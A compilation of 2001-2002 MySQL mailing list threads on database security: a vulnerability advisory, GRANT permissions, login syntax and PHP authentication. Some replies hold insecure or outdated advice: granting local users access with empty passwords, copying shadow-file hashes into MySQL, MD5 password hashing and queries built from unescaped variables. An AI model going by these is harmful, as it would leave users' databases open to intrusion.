Is MySQL.COM the wrong place?

-- 
Michael Bacarella  | Netgraft Corp
   | 545 Eighth Ave #401
 Systems Analysis  | New York, NY 10018
Technical Support  | 212 946-1038 | 917 670-6982
 Managed Services  | http://netgraft.com/


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL security vulnerabilites question

[Lenz Grimmer]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

On Tue, 17 Dec 2002, Jannie Qu wrote:

> I got the following information. Does any one of you know whether it
> will impact my MySQL db server or not: Version 3.23.53 with InnoDB on
> Mac OS Darwin Kernel Version 6.2. If it does, what's the solution?

Yes, an unpatched MySQL 3.23.53 is vulnerable to the mentioned security
problems. We provide updated binaries for Mac OS X 10.2 on our download
web pages: http://www.mysql.com/downloads/mysql-3.23.html

Bye,
LenZ
- -- 
For technical support contracts, visit https://order.mysql.com/?ref=mlgr
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /  Mr. Lenz Grimmer <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__ MySQL AB, Production Engineer
/_/  /_/\_, /___/\___\_\___/ Hamburg, Germany
   <___/   www.mysql.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.0 (GNU/Linux)
Comment: For info see http://quantumlab.net/pine_privacy_guard/

iD8DBQE9/4SISVDhKrJykfIRAhacAJ9F2DS04VyE3Pk4NyaFd03JteZD5QCfd4WU
QKts7z3+AZ/TkXK+vaK4VcI=
=bQUF
-END PGP SIGNATURE-


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

MySQL security vulnerabilites question

[Jannie Qu]

Hi, all,
sql, query.

Greetings.

I got the following information. Does any one of you know whether it will 
impact my MySQL db server or not: Version 3.23.53 with InnoDB on Mac OS 
Darwin Kernel Version 6.2. If it does, what's the solution?

Thank you,
Jannie Qu

===
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, December 17, 2002 8:57 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: [CLA-2002:555] Conectiva Linux Security Announcement - MySQL


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT
- --

PACKAGE   : MySQL
SUMMARY   : Several Vulnerabilities
DATE  : 2002-12-17 11:51:00
ID: CLA-2002:555
RELEVANT
RELEASES  : 6.0, 7.0, 8

- -

DESCRIPTION
MySQL is a very popular SQL database, distributed under the GNU-GPL
license.

Stefan Esser from e-matters[1] discovered several vulnerabilities in
the MySQL code that affect both the server and the client library
(libmysql) of MySQL.

The server vulnerabilities can be exploited to crash the MySQL
server, bypass password restrictions or even execute arbitrary code
with the privileges of the user running the server process.

The library ones consist in an arbitrary size heap overflow and a
memory addressing problem that can be both exploited to crash or
execute arbitrary code in programs linked against libmysql.

More details about each vulnerability can be found in the e-matters
security advisory[2].

The Common Vulnerabilities and Exposures project (cve.mitre.org) is
tracking these issues with the names CAN-2002-1373, CAN-2002-1374,
CAN-2002-1375 and CAN-2002-1376.


SOLUTION
We recommend that all MySQL users upgrade their packages as soon as
possible.

IMPORTANT: after the upgrade the mysql service must be restarted
manually. In order to do that, run the following command as root:

# /sbin/service mysql restart

It is also recomended to restart all programs linked against
libmysql. A list of such programs in execution can be obtained with
the following command:

# /usr/sbin/lsof | grep libmysql


REFERENCES:
1.http://www.e-matters.de/
2.http://security.e-matters.de/advisories/042002.html
3.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1373
4.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1374
5.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1375
6.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1376


UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-bench-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-client-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-static-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-doc-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/MySQL-3.23.36-14U60_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-bench-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-client-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-devel-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-devel-static-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-doc-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/MySQL-3.23.36-14U70_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-bench-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-client-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-devel-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-devel-static-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-doc-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/MySQL-3.23.46-4U80_2cl.src.rpm


ADDITIONAL INSTRUCTIONS
Users of Conectiva Linux version 6.0 or higher may use apt to perform
upgrades of RPM packages:

- run: apt-get update
- after that, execute: apt-get upgrade

Detailed instructions reagarding the use of apt and upgrade examples
can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


- -
All packages are signed with Conectiva's GPG key. The key and instructions
o

Mysql security and CGI

[raj]

Hello all!

I am working on a site which is using mod_perl and a mysql database on
Linux with Apache. I am also putting cookies and user address information
into a "cookies" table to fill up form fields for subsequent visits.
Standard enough. Also, the database is on the same server as apache.

Now, my problem is that I am paranoid about hackers who are able to break
in through apache and assume the user "apache". Who can then issue
mysql "selects" and "inserts" on the cookies table.

Does anyone have pointers to mysql security docs and such where I can do
what I want without these concerns?

Thanks a buncho in advance!


--Raj

PS:

THANK YOU MYSQL DEVELOPERS What a god-send!! *





-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL security

[Jeremy Zawodny]

On Tue, Jul 16, 2002 at 02:51:59PM +0200, Mathias Bertelsen wrote:
> Hello
> 
> Do you think MySQL is secure enough to keep peoples bookkeeping in?
> is it safe enough to use without risk of losing important data? Is
> it necessary to do anything to make it secure? (eg. use of
> transactions/backup/power failure security)

It is.
-- 
Jeremy D. Zawodny |  Perl, Web, MySQL, Linux Magazine, Yahoo!
<[EMAIL PROTECTED]>  |  http://jeremy.zawodny.com/

MySQL 3.23.51: up 47 days, processed 1,016,208,690 queries (246/sec. avg)

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL security

[Dan Lamb]

We use MySQL to store financial data and have never had a problem.

The things you mentioned (transactions/backup/power failure security) should
be used with ANY database that stores critical information that cannot be
lost.  No database is completely bullet proof.  Regular backups stored at an
offsite location, UPS power supply protection, transactions, and LOTS of
testing before going live are the best things you can do.

Regards,
Daniel Lamb

- Original Message -
From: "Mathias Bertelsen" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, July 16, 2002 8:51 AM
Subject: MySQL security


>
> Hello
>
> I have a question for all you MySQL people out there
>
> We are a group of people planning to make a small open source
> ERP/accounting/finance program. We have earlier used MySQL to great
> satisfaction in other areas and would like to use it here. My question is:
>
> Do you think MySQL is secure enough to keep peoples bookkeeping in? is it
> safe enough to use without risk of losing important data? Is it necessary
to
> do anything to make it secure? (eg. use of transactions/backup/power
failure
> security)
>
> Any comments are welcome :)
>
> /Mathias
>
>
> -
> Before posting, please check:
>http://www.mysql.com/manual.php   (the manual)
>http://lists.mysql.com/   (the list archive)
>
> To request this thread, e-mail <[EMAIL PROTECTED]>
> To unsubscribe, e-mail
<[EMAIL PROTECTED]>
> Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php
>
>


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

MySQL security

[Mathias Bertelsen]

Hello

I have a question for all you MySQL people out there

We are a group of people planning to make a small open source
ERP/accounting/finance program. We have earlier used MySQL to great
satisfaction in other areas and would like to use it here. My question is:

Do you think MySQL is secure enough to keep peoples bookkeeping in? is it
safe enough to use without risk of losing important data? Is it necessary to
do anything to make it secure? (eg. use of transactions/backup/power failure
security)

Any comments are welcome :)

/Mathias


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

RE: MySQL security

[nigel wood]

On Tue, 16 Apr 2002, David Ayliffe wrote:
> Are MySQL really going to give you details of their past security
> 'issues'?
> 
> Think about it.  Try going underground and looking on some exploit
> sites.
> 
> DA
> 
> 
> >
> Hi,
> I'm working on security breaches in MySQL. Can someone guide me in this.
> To be precise can you tell me about some literature, some book which is
> easy to understand and also profound ! If anyone is working on that,
> I'll be more than happy to interact. Thanking you.

Why not? If a vunerability is discovered for which no known exploit exists
it's reasonable to withold that information (for a limited period) whilst a fix
is developed.  If the vunerability is showing up on exploit sites I'd expect
MySQL AB to be shouting it's existance (if not howto details) from the roof
tops so the users can take counter measures whether a fix exists or not. 

Nigel

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

RE: MySQL security

[David Ayliffe]

Are MySQL really going to give you details of their past security
'issues'?

Think about it.  Try going underground and looking on some exploit
sites.

DA


>
Hi,
I'm working on security breaches in MySQL. Can someone guide me in this.
To be precise can you tell me about some literature, some book which is
easy to understand and also profound ! If anyone is working on that,
I'll be more than happy to interact. Thanking you.

Paras.


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

MySQL security

[Paras G. Mukadam]

Hi,
I'm working on security breaches in MySQL. Can someone guide me
in this. To be precise can you tell me about some literature,
some book which is easy to understand and also profound ! If
anyone is working on that, I'll be more than happy to interact.
Thanking you.

Paras.


For live cricket scores download  Yahoo! Score Tracker
 at: http://in.sports.yahoo.com/cricket/tracker.html

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL security on Win2k server ??

[Michael Vejs]

- Original Message -
From: <[EMAIL PROTECTED]>
To: Michael Vejs <[EMAIL PROTECTED]>
Sent: Friday, February 22, 2002 12:45 PM
Subject: Re: MySQL security on Win2k server ??


> Your message cannot be posted because it appears to be either spam or
> simply off topic to our filter. To bypass the filter you must include
> one of the following words in your message:
>
> sql,query
>
> If you just reply to this message, and include the entire text of it in
the
> reply, your reply will go through. However, you should
> first review the text of the message to make sure it has something to do
> with MySQL. Just typing the word MySQL once will be sufficient, for
example.
>
> You have written the following:
>
> Hi
>
> Im currently about to secure my webserver which is a Windows 2000 Server
and
> im in doubt on which security I can set and where..
>
> My Q is therefore:
>
> Which user is required to access which folder(s) ?
>
> Regards
>
> Michael Vejs
> Denmark
>
>
>


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: mySQL security

[Sherwin Ang]

It should also be made clear that MySQL users is different from System
Users.  MySQL root account is also different with the System Root Account.

You can restrict users to certain databases with the appropriate parameters
on what the db user can and cannot do.

mysql> user mysql;
mysql> grant insert, select, update on testdb.* to user@localhost identified
by 'hispassword';
mysql> flush privileges;

this would only allow him to do selects, updates and inserts on the database
testdb and all tables underlying it, but cannot delete, read from files etc.

GRANT is in detail at
http://www.mysql.com/documentation/mysql/bychapter/manual_MySQL_Database_Adm
inistration.html#GRANT


Thanks,

Sherwin Ang
Web Programmer / Systems Administrator
Alchemy Solutions
http://www.alchemy.com.ph
Creative. Technology.

Tridel Technologies, Inc.
7th Floor Hanston Building
Emerald Ave., Ortigas Center
Pasig City

Tel: (632) 634-5141/ (632) 634-5140
Fax: (632) 634-5139


- Original Message -
From: "Gerald R. Jensen" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, January 08, 2002 11:25 AM
Subject: Re: mySQL security


> Dear "- -":
>
> I would revoke all permissions for dummy, then create new permissions for
> users on a database-by-database basis. If you look at the syntax for GRANT
> in the manual, you can stipulate which databases a user would have access
> to.
>
> A word of caution: don't use root. Create a user for yourself and give it
> full permissions, then use it to administer teh database.
>
> Gerald Jensen
>
> - Original Message -
> From: "- -" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Monday, January 07, 2002 9:13 PM
> Subject: mySQL security
>
>
> Hi all,
>
> I have set up mySQL database server on my web server running on RH
Linux7.2.
> There are 2 user accounts, root and dummy who can access to databases. I'm
> wondering how to restrict the accesss to mysql (the db which stores user
id,
> password, etc...).  Right now, both users can run select, delete,
update...
> statements on this database.  How do I set the permissions so that only
root
> can view, modify, delete tables or data in this database?
>
> Thanks in advance,
> kaz
>
> _
> Join the world's largest e-mail service with MSN Hotmail.
> http://www.hotmail.com
>
>
> -
> Before posting, please check:
>http://www.mysql.com/manual.php   (the manual)
>http://lists.mysql.com/   (the list archive)
>
> To request this thread, e-mail <[EMAIL PROTECTED]>
> To unsubscribe, e-mail
> <[EMAIL PROTECTED]>
> Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php
>
>
>
> -
> Before posting, please check:
>http://www.mysql.com/manual.php   (the manual)
>http://lists.mysql.com/   (the list archive)
>
> To request this thread, e-mail <[EMAIL PROTECTED]>
> To unsubscribe, e-mail
<[EMAIL PROTECTED]>
> Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php
>



-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: mySQL security

[Gerald R. Jensen]

Dear "- -":

I would revoke all permissions for dummy, then create new permissions for
users on a database-by-database basis. If you look at the syntax for GRANT
in the manual, you can stipulate which databases a user would have access
to.

A word of caution: don't use root. Create a user for yourself and give it
full permissions, then use it to administer teh database.

Gerald Jensen

- Original Message -
From: "- -" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, January 07, 2002 9:13 PM
Subject: mySQL security


Hi all,

I have set up mySQL database server on my web server running on RH Linux7.2.
There are 2 user accounts, root and dummy who can access to databases. I'm
wondering how to restrict the accesss to mysql (the db which stores user id,
password, etc...).  Right now, both users can run select, delete, update...
statements on this database.  How do I set the permissions so that only root
can view, modify, delete tables or data in this database?

Thanks in advance,
kaz

_
Join the world's largest e-mail service with MSN Hotmail.
http://www.hotmail.com


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail
<[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php



-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

mySQL security

[- -]

Hi all,

I have set up mySQL database server on my web server running on RH Linux7.2.
There are 2 user accounts, root and dummy who can access to databases. I'm
wondering how to restrict the accesss to mysql (the db which stores user id,
password, etc...).  Right now, both users can run select, delete, update...
statements on this database.  How do I set the permissions so that only root
can view, modify, delete tables or data in this database?

Thanks in advance,
kaz

_
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

RE: MySQL Security w/ PHP

[Carsten H. Pedersen]

> Hi!
>
> On Oct 28, Kevin Maynard wrote:
> > I have been building an extensive dB with MySQL for a large Insurance
> > Company and am nearing the completion stage.  I have build several PHP
> > forms to show the preliminary pages to the various groups who will be
> > using this dB.
> >
> > I have created the sign-in page where each user has types in their ID
> > and PW.  From then on each query uses those variables for credentials.
> > To avoid duplication, I would like to use the USER form from the MySQL
> > dB.
>
> You shouldn't do it.
> These table is used by mysql server internally,
> and shouldn't be accessed directly.
> To modify this user table one should use GRANT and REVOKE statements.
> To read it - SHOW GRANTS.
>
> (actually, it can be accessed directly, but ONLY if you're know
> what you're doing. It looks like you aren't)
>
> > Since that uses the Password("PW") function, I can't seem to get my
> > validation query to work properly.  For example:
> >
> > SELECT User,Password from user where (User=$ID AND Password=$PW);
> >
> > Result: Empty Set.
> >
> > SELECT User,Password from user where (User=$ID AND Password($PW));
> >
> > Result: Will match User only, will accept ANY PW.
>
> SELECT User,Password from user where (User=$ID AND
> Password=PASSWORD($PW));
>
> > Does anyone know how to properly check off the PW from the User
> table in
> > the MySQL db?
>
> The proper way is not to use system tables, and mysql db in general.
> Create your own database, and User table in it.
> And, the last, you'd better use MD5() instead of PASSWORD().

Another good reason not to do this: At startup, mysqld reads all
privileges for all users into memory - and they stay there whether
or not those people log in. Seems to be a pretty stupid way of
using up your RAM. Add to that the time spent by MySQL checking
permissions for one in thousands of users for every single query
- ugh...

/ Carsten
--
Carsten H. Pedersen
keeper and maintainer of the bitbybit.dk MySQL FAQ
http://www.bitbybit.dk/mysqlfaq



-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL Security w/ PHP

[Sergei Golubchik]

Hi!

On Oct 28, Kevin Maynard wrote:
> I have been building an extensive dB with MySQL for a large Insurance 
> Company and am nearing the completion stage.  I have build several PHP 
> forms to show the preliminary pages to the various groups who will be 
> using this dB.
> 
> I have created the sign-in page where each user has types in their ID 
> and PW.  From then on each query uses those variables for credentials.  
> To avoid duplication, I would like to use the USER form from the MySQL 
> dB.

You shouldn't do it.
These table is used by mysql server internally,
and shouldn't be accessed directly.
To modify this user table one should use GRANT and REVOKE statements.
To read it - SHOW GRANTS.

(actually, it can be accessed directly, but ONLY if you're know
what you're doing. It looks like you aren't)

> Since that uses the Password("PW") function, I can't seem to get my 
> validation query to work properly.  For example:
> 
> SELECT User,Password from user where (User=$ID AND Password=$PW);
> 
> Result: Empty Set.
> 
> SELECT User,Password from user where (User=$ID AND Password($PW));
> 
> Result: Will match User only, will accept ANY PW.

SELECT User,Password from user where (User=$ID AND Password=PASSWORD($PW));

> Does anyone know how to properly check off the PW from the User table in 
> the MySQL db?

The proper way is not to use system tables, and mysql db in general.
Create your own database, and User table in it.
And, the last, you'd better use MD5() instead of PASSWORD().

Regards,
Sergei

-- 
MySQL Development Team
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /   Sergei Golubchik <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__  MySQL AB, http://www.mysql.com/
/_/  /_/\_, /___/\___\_\___/  Osnabrueck, Germany
   <___/

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

RE: MySQL Security w/ PHP

[Quentin Bennett]

Have you tried something like

SELECT User,Password from user where (User=$ID AND Password($PW)=password);

ie. equate the result of password("string") to the stored, encrypted,
password

Regards

Quentin

-Original Message-
From: Kevin Maynard [mailto:[EMAIL PROTECTED]]
Sent: Monday, 29 October 2001 11:52 a.m.
To: [EMAIL PROTECTED]
Subject: MySQL Security w/ PHP


I have been building an extensive dB with MySQL for a large Insurance 
Company and am nearing the completion stage.  I have build several PHP 
forms to show the preliminary pages to the various groups who will be 
using this dB.

I have created the sign-in page where each user has types in their ID 
and PW.  From then on each query uses those variables for credentials.  
To avoid duplication, I would like to use the USER form from the MySQL 
dB.  Since that uses the Password("PW") function, I can't seem to get my 
validation query to work properly.  For example:

SELECT User,Password from user where (User=$ID AND Password=$PW);

Result: Empty Set.

SELECT User,Password from user where (User=$ID AND Password($PW));

Result: Will match User only, will accept ANY PW.

Does anyone know how to properly check off the PW from the User table in 
the MySQL db?

Thanks,

Kevin


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail
<[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

The information contained in this email is privileged and confidential
and intended for the addressee only. If you are not the intended 
recipient, you are asked to respect that confidentiality and not 
disclose, copy or make use of its contents. If received in error 
you are asked to destroy this email and contact the sender immediately. 
Your assistance is appreciated.

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

MySQL Security w/ PHP

[Kevin Maynard]

I have been building an extensive dB with MySQL for a large Insurance 
Company and am nearing the completion stage.  I have build several PHP 
forms to show the preliminary pages to the various groups who will be 
using this dB.

I have created the sign-in page where each user has types in their ID 
and PW.  From then on each query uses those variables for credentials.  
To avoid duplication, I would like to use the USER form from the MySQL 
dB.  Since that uses the Password("PW") function, I can't seem to get my 
validation query to work properly.  For example:

SELECT User,Password from user where (User=$ID AND Password=$PW);

Result: Empty Set.

SELECT User,Password from user where (User=$ID AND Password($PW));

Result: Will match User only, will accept ANY PW.

Does anyone know how to properly check off the PW from the User table in 
the MySQL db?

Thanks,

Kevin


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: Mysql Security (fwd)

[Christian Grimm]

> The fact that he has logged on should not require him to specify
> password again.

This fact means: when a user is logged in, he is allowed to use the 
mysql-server:

use this one:( every logged -on -user on localhost has all rights to 
every base and table without pw)

GRANT USAGE ON  *.*
TO "%@localhost"
IDENTIFIED BY "";

Hope thats the right one... ;-)
Christian


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: Mysql Security (fwd)

[sachin shetty]

-- Forwarded message --
Date: Thu, 26 Jul 2001 13:15:06 -0400 (EDT)
From: sachin shetty <[EMAIL PROTECTED]>
To: Christian Grimm <[EMAIL PROTECTED]>
Subject: Re: Mysql Security


Thanks Christian

But when a user connects to the server isnt it mandatory to specify the
password?. Is it possible to authenticate the user by only his unix
username.The fact that he has logged on should not require him to specify
password again.

Thanks again




-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Mysql Security

[Christian Grimm]

Hello my friend,
shure its possible!
additional you can insert into the user table of mysql the encryptet 
Password-Hash of your local
etc.shadow-Phile to verify the correct Password and authenticate the the 
user.

Hope it helps
Christian

sachin shetty wrote:

> Hello
> 
> Is it possible to authenticate a user running mysql client  by comparing
> the unix username($LOGNAME) with the user table in mysql.It seems more
> secure than   specifying the authenticaton parameters in a configuation
> file or along with the client.
> Thanks
> Sachin
> 
> 
> -
> Before posting, please check:
>http://www.mysql.com/manual.php   (the manual)
>http://lists.mysql.com/   (the list archive)
> 
> To request this thread, e-mail <[EMAIL PROTECTED]> 
> 
> To unsubscribe, e-mail 
> <[EMAIL PROTECTED]> 
> 
> Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php
> 



-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Mysql Security

[sachin shetty]

Hello

Is it possible to authenticate a user running mysql client  by comparing
the unix username($LOGNAME) with the user table in mysql.It seems more
secure than   specifying the authenticaton parameters in a configuation
file or along with the client. 

Thanks 

Sachin


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

RE: MySQL security settings

[Neil Zanella]

On Fri, 8 Jun 2001, nyon wrote:

> I installed MySQL on Windows NT.
> Currently, I login in using annoyomous user.
> I can't seem to login in as root user.
> The syntax is : mysql -u root -p xxx

With the above command mysql thinks you are trying to access
database xxx using a password to be specified on the command line.
The correct syntax is:

mysql -u root -pxxx

Note that there is no space between the -p and the password.
Also note that unless you are executing this command from
within a script this is insecure as other users could sniff
your database password from the command line.

Neil


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

RE: MySQL security settings

[nyon]

I installed MySQL on Windows NT.
Currently, I login in using annoyomous user.
I can't seem to login in as root user.
The syntax is : mysql -u root -p xxx

It's seems funny as I can see the root password in the MySQL database --> user table.

Any help ?

Nyon

Re: MySQL Security

[William R. Mussatto]

Apache can be set to run your cgi as you user which means that it could 
be set world unreadable I think.

On Wed, 4 Apr 2001, Taing Nguon wrote:

> Date: Wed, 4 Apr 2001 07:14:33 +0700
> From: Taing Nguon <[EMAIL PROTECTED]>
> To: "William R. Mussatto" <[EMAIL PROTECTED]>
> Cc: [EMAIL PROTECTED]
> Subject: Re: MySQL Security
> 
> > Make sure that the files are not world readable.
> 
> In Linux system, In order to run CGI in PERL script, that perl script
> must be 755. It is read by any users and Perl is written in text format, so
> Its is easy to know user and password of MYSQL. How do you think about
> this?Need More HELP
